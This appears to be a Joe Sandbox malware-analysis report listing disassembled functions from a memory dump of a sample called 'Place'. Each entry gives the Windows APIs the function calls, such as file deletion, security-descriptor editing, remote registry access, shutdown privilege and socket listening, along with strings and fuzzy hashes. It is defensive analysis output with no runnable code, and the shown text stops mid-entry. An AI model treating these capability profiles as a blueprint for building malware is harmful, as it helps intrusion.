Opcode Fuzzy Hash: a3e74716fdbe056ecc1880e2f9a65a736c72a2de0135a39afdd2594acb703212
Instruction Fuzzy Hash: CE026D752006129FCB18EF24C845E6ABBE5FF89714F04895DF89A9B3A1DB30ED41CB91

Function 005EF735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 005EF756
_wcscmp.LIBCMT ref: 005EF76B
_wcscmp.LIBCMT ref: 005EF782

Part of subcall function 005E4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005E4890

FindNextFileW.KERNEL32(00000000,?), ref: 005EF7B1
FindClose.KERNEL32(00000000), ref: 005EF7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 005EF7D8
_wcscmp.LIBCMT ref: 005EF7FF
_wcscmp.LIBCMT ref: 005EF816
SetCurrentDirectoryW.KERNEL32(?), ref: 005EF828
SetCurrentDirectoryW.KERNEL32(0063B578), ref: 005EF846
FindNextFileW.KERNEL32(00000000,00000010), ref: 005EF850
FindClose.KERNEL32(00000000), ref: 005EF85D
FindClose.KERNEL32(00000000), ref: 005EF86F

Strings

j^, xrefs: 005EF82A
*.*, xrefs: 005EF7D3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j^
API String ID: 1824444939-2768135852
Opcode ID: 88a1c16ddf2ccf767c19b83a5add1069c7d7ea27cc7d95483ee97ea1c1139303
Instruction ID: cf68e9229311e31e962929792de2c3a4b6a9d75af928522ffd2fedfa57792ca7
Opcode Fuzzy Hash: 88a1c16ddf2ccf767c19b83a5add1069c7d7ea27cc7d95483ee97ea1c1139303
Instruction Fuzzy Hash: 4131053250424A6AEF149FB5DC49ADE7BADEF49320F144166F884E21A0DF70CF85CB60

Function 005D88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005D8E3C
Part of subcall function 005D8E20: GetLastError.KERNEL32(?,005D8900,?,?,?), ref: 005D8E46
Part of subcall function 005D8E20: GetProcessHeap.KERNEL32(00000008,?,?,005D8900,?,?,?), ref: 005D8E55
Part of subcall function 005D8E20: HeapAlloc.KERNEL32(00000000,?,005D8900,?,?,?), ref: 005D8E5C
Part of subcall function 005D8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005D8E73

Part of subcall function 005D8EBD: GetProcessHeap.KERNEL32(00000008,005D8916,00000000,00000000,?,005D8916,?), ref: 005D8EC9
Part of subcall function 005D8EBD: HeapAlloc.KERNEL32(00000000,?,005D8916,?), ref: 005D8ED0
Part of subcall function 005D8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005D8916,?), ref: 005D8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005D8931
_memset.LIBCMT ref: 005D8946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005D8965
GetLengthSid.ADVAPI32(?), ref: 005D8976
GetAce.ADVAPI32(?,00000000,?), ref: 005D89B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005D89CF
GetLengthSid.ADVAPI32(?), ref: 005D89EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005D89FB
HeapAlloc.KERNEL32(00000000), ref: 005D8A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 005D8A23
CopySid.ADVAPI32(00000000), ref: 005D8A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005D8A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005D8A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 005D8A95

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 34b7f46da1a5ece1088436acd4e82c0cd6afaee9cd342e8ca7d439cc8623e62e
Instruction ID: 0b622f5bd4df3cbfdb85fb692d633f5ec44917b8727b28b291cbdac12fbc3ec2
Opcode Fuzzy Hash: 34b7f46da1a5ece1088436acd4e82c0cd6afaee9cd342e8ca7d439cc8623e62e
Instruction Fuzzy Hash: AC61487590020ABFDF10DFA9DC45AFEBBBAFF44311F04816BE815A6290DB759A04CB60

Function 00600A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0060147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0060040D,?,?), ref: 00601491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00600B0C

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00600BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00600C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00600E82
RegCloseKey.ADVAPI32(00000000), ref: 00600E8F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: cdc28ebc3641ad0bc41476fba0a9165649afbc9fd627014c5aae7e5188ad1ea4
Instruction ID: 192bccb6cc56fcdc311087513b7cc0764cf8c17ae9d0ff67577ff98bf7382b9c
Opcode Fuzzy Hash: cdc28ebc3641ad0bc41476fba0a9165649afbc9fd627014c5aae7e5188ad1ea4
Instruction Fuzzy Hash: 76E14A31204211AFDB14DF28C895E6BBBE9FF89714F04896DF84ADB2A1DB30E901CB51

Function 005E443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 005E4451
__swprintf.LIBCMT ref: 005E445E

Part of subcall function 005A38C8: __woutput_l.LIBCMT ref: 005A3921

FindResourceW.KERNEL32(?,?,0000000E), ref: 005E4488
LoadResource.KERNEL32(?,00000000), ref: 005E4494
LockResource.KERNEL32(00000000), ref: 005E44A1
FindResourceW.KERNEL32(?,?,00000003), ref: 005E44C1
LoadResource.KERNEL32(?,00000000), ref: 005E44D3
SizeofResource.KERNEL32(?,00000000), ref: 005E44E2
LockResource.KERNEL32(?), ref: 005E44EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 005E454F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 45cfca068807996ecff6db6b8503221f85f780c4ed40ea72486d238b162043af
Instruction ID: 268ac9bb118fb49fd219bb32b4b513615ce0ed8f580d8a6ca6a60ab3c75acdaf
Opcode Fuzzy Hash: 45cfca068807996ecff6db6b8503221f85f780c4ed40ea72486d238b162043af
Instruction Fuzzy Hash: 3331AE7160125AAFDF159F61EC48ABF7FAAFB09304F048426F941D6150EB74DA50CAA0

Function 005F4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 005F4857
EmptyClipboard.USER32 ref: 005F485D
GlobalAlloc.KERNEL32(00000002,?), ref: 005F4872
CloseClipboard.USER32 ref: 005F4911

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 3ab9784bfcc7923871da438f046dc38d612e33b66e38f6c607db5185ad7eb13d
Instruction ID: 061e64b7d06f0e804cb69ac1c7b243d70f929940ef297ab74703547eac25ab8b
Opcode Fuzzy Hash: 3ab9784bfcc7923871da438f046dc38d612e33b66e38f6c607db5185ad7eb13d
Instruction Fuzzy Hash: 2C21A3312012159FEF11AF64ED0DB6E7BA9FF84711F048016F9059B261DBB4AD40CF94

Function 005E3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005A0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00592A58,?,00008000), ref: 005A02A4

Part of subcall function 005E4FEC: GetFileAttributesW.KERNEL32(?,005E3BFE), ref: 005E4FED

FindFirstFileW.KERNEL32(?,?), ref: 005E3D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 005E3E3E
MoveFileW.KERNEL32(?,?), ref: 005E3E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 005E3E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 005E3E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 005E3EAC

Strings

\*.*, xrefs: 005E3D41, 005E3D4A, 005E3D5F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: de15f51aa1e20aaad0ea20d60ce41301d75a855501bb59d0a0bc31116be2bc51
Instruction ID: 48dfedd5a433293960d3eaa4cf7ff77a1afd7337384e417ef4f3e6443877a013
Opcode Fuzzy Hash: de15f51aa1e20aaad0ea20d60ce41301d75a855501bb59d0a0bc31116be2bc51
Instruction Fuzzy Hash: 5451713180115FAACF19EBA1CA9A9EDBB79BF51300F644165F482B3191EB316F09CB60

Function 005EFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005EFA83
FindClose.KERNEL32(00000000), ref: 005EFB96

Part of subcall function 005852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005852E6

Sleep.KERNEL32(0000000A), ref: 005EFAB3
_wcscmp.LIBCMT ref: 005EFAC7
_wcscmp.LIBCMT ref: 005EFAE2
FindNextFileW.KERNEL32(?,?), ref: 005EFB80

Strings

*.*, xrefs: 005EFA68

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: c114668d0fce63b9560ac44643731f6a2061003df663ee3c46fb0d21016458af
Instruction ID: d754509ff0e22ff1f4596fc38c9f551306e45bda5a74076203adec092f454848
Opcode Fuzzy Hash: c114668d0fce63b9560ac44643731f6a2061003df663ee3c46fb0d21016458af
Instruction Fuzzy Hash: 5C418C7194025AAFDF18DF64CC59AEEBFB9FF05310F148566F854A2290EB309E84CB90

Function 005E5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 005D9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005D93E3
Part of subcall function 005D9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005D9410
Part of subcall function 005D9399: GetLastError.KERNEL32 ref: 005D941D

ExitWindowsEx.USER32(?,00000000), ref: 005E57B4

Strings

SeShutdownPrivilege, xrefs: 005E5784
, xrefs: 005E57A2
@, xrefs: 005E57A7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: a35cbd43591bd20458990e6404f092d8214f5277fb5291ebcae26a5ddda4152e
Instruction ID: a5dda169c44886754dfb02da1bb647730876361a4ce68307238694916f9a2f2d
Opcode Fuzzy Hash: a35cbd43591bd20458990e6404f092d8214f5277fb5291ebcae26a5ddda4152e
Instruction Fuzzy Hash: 0401F771A50752EAF72C626A9C8ABBB7E59FB047C8F14143AF993D20D2FA505C608150

Function 005F696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005F69C7
WSAGetLastError.WSOCK32(00000000), ref: 005F69D6
bind.WSOCK32(00000000,?,00000010), ref: 005F69F2
listen.WSOCK32(00000000,00000005), ref: 005F6A01
WSAGetLastError.WSOCK32(00000000), ref: 005F6A1B
closesocket.WSOCK32(00000000,00000000), ref: 005F6A2F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: a9a4cbb3a604162aed49e42da99c3f8de257ce19c5abc0d375dff37e1bef4680
Instruction ID: eafddcd8e89c5c968fd8bba7cf9f1168ec08e78c7e8492c60dcc8cbeccb1412c
Opcode Fuzzy Hash: a9a4cbb3a604162aed49e42da99c3f8de257ce19c5abc0d375dff37e1bef4680
Instruction Fuzzy Hash: 6C21E13020020A9FDB10EF68C949A7EBBA9FF84720F14855AE956A73D1DB70AC41CB90

Function 00581663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00581DD6
GetSysColor.USER32(0000000F), ref: 00581E2A
SetBkColor.GDI32(?,00000000), ref: 00581E3D

Part of subcall function 0058166C: DefDlgProcW.USER32(?,00000020,?), ref: 005816B4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 501aa6885de13adcc5cccfbb24cddef0384360d0da9a82f435a584b214d4d9c1
Instruction ID: 1a1d72d4147a3afb4aeba1805a72e5c5a6db173bca6981e1b573a1d7f5a755ca
Opcode Fuzzy Hash: 501aa6885de13adcc5cccfbb24cddef0384360d0da9a82f435a584b214d4d9c1
Instruction Fuzzy Hash: 8AA107B4106C05BEE72CBB698C49FBB2D5EFB41341B144A1AFC42E5191CBA5AD03937D

Function 005EC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005EC329
_wcscmp.LIBCMT ref: 005EC359
_wcscmp.LIBCMT ref: 005EC36E
FindNextFileW.KERNEL32(00000000,?), ref: 005EC37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 005EC3AF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: c15d83185a6a3e29c09fd010d439056c8be1d9fe10a0e56406cee021bc32bcc1
Instruction ID: 5fea54b071e1e72045318eeab1c272322f49635eb87b8cc3ff9216a17921f060
Opcode Fuzzy Hash: c15d83185a6a3e29c09fd010d439056c8be1d9fe10a0e56406cee021bc32bcc1
Instruction Fuzzy Hash: 6551BD356046028FDB18DF69C494DAABBE4FF49310F104A1DF9968B3A1DB30ED01CB91

Function 005F6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005F8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005F84A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005F6E89
WSAGetLastError.WSOCK32(00000000), ref: 005F6EB2
bind.WSOCK32(00000000,?,00000010), ref: 005F6EEB
WSAGetLastError.WSOCK32(00000000), ref: 005F6EF8
closesocket.WSOCK32(00000000,00000000), ref: 005F6F0C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 031e8bbefa86aa863228cb3231628a24b133290491df36628b420599f0fd35b4
Instruction ID: c509121d3e422130fe876c96997f2e6d1d5f792805c50dbde8aeaaceaa21556c
Opcode Fuzzy Hash: 031e8bbefa86aa863228cb3231628a24b133290491df36628b420599f0fd35b4
Instruction Fuzzy Hash: 6E41E6756002066FDB10BF649C8AF7E7BA8FB84714F048559FE16AB3D2DA749D008F91

Function 006059B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00605A02
IsWindowEnabled.USER32 ref: 00605A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00605A1D
IsIconic.USER32 ref: 00605A2B
IsZoomed.USER32 ref: 00605A39

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 0e1660df524c764bf84ecc3043a1db1e20dd65241979a5e8a9e0299dcbc2fa65
Instruction ID: ef7be8322b98fdc2b94108aa56defb4e0ce17b526822170f3ce198c6d586f736
Opcode Fuzzy Hash: 0e1660df524c764bf84ecc3043a1db1e20dd65241979a5e8a9e0299dcbc2fa65
Instruction Fuzzy Hash: C311B6313419129FEB256F669C84AAB7B9AFF84760B04812AF846D7381DA70D9018FE0

Function 005C0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 005C0034
__swprintf.LIBCMT ref: 005C0065

Strings

WIN_XPe, xrefs: 005C00A4
%.3d, xrefs: 005C003F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: e0a688d6e84d196b67a90193f3b15cd568fd450108cc34d84b8ee901136eefba
Instruction ID: 1a0809c0fa870e972da0b1e23470d1e6cc5e73fa4fd34356cc17ba42e639bf29
Opcode Fuzzy Hash: e0a688d6e84d196b67a90193f3b15cd568fd450108cc34d84b8ee901136eefba
Instruction Fuzzy Hash: 2CD01271808119EECB049AD0C84CFF97B7CFB48305F656856F506B2090E73587889B26

Function 005F29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005F1ED6,00000000), ref: 005F2AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 005F2AE4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: c7fd247851c1a4ea808168edbc4114f53d39db9692ba06c2e013e151f9b83dd2
Instruction ID: 045499323956a3155083f74be8ccef82a6f676ae2a461c56f34077bf3627416a
Opcode Fuzzy Hash: c7fd247851c1a4ea808168edbc4114f53d39db9692ba06c2e013e151f9b83dd2
Instruction Fuzzy Hash: 2641D5B160060EBFEB20DE94CC85EBFBBACFB40754F10441AF745A7141EAB49E419660

Function 005D9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 005A0FE6: std::exception::exception.LIBCMT ref: 005A101C
Part of subcall function 005A0FE6: __CxxThrowException@8.LIBCMT ref: 005A1031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005D93E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005D9410
GetLastError.KERNEL32 ref: 005D941D

Memory Dump Source

